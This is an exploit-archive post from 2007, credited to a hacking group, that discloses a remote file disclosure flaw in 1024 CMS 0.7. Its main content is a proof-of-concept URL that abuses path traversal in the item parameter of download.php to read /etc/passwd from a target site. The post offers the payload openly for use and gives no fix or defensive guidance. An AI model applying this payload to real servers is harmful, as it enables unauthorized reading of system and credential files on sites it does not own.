Home / exploits 1024CMS-disclose.txt
Posted on 03 May 2007
#'#/ (-.-) --------------------oOO---(_)---OOo------------------- | [ Y! Underground Group ] | | [ www.dj7xpl.2600.ir ] | | [ Dj7xpl @ 2600.ir ] | ------------------------------------------------------ <---------------------------------------------------------------------------------------------------------------------> [!] Portal : 1024 CMS Version 0.7 [!] Vendor : http://www.treble.lfhost.com [!] Author : Dj7xpl [!] Type : Remote File Disclosure Vuln [!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me <---------------------------------------------------------------------------------------------------------------------> <---------------------------------------------------------------------------------------------------------------------> PoC : http://[Target]/[Path]/includes/download.php?item=../uploads/[File] http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd <--------------------------------------------------------------------------------------------------------------------->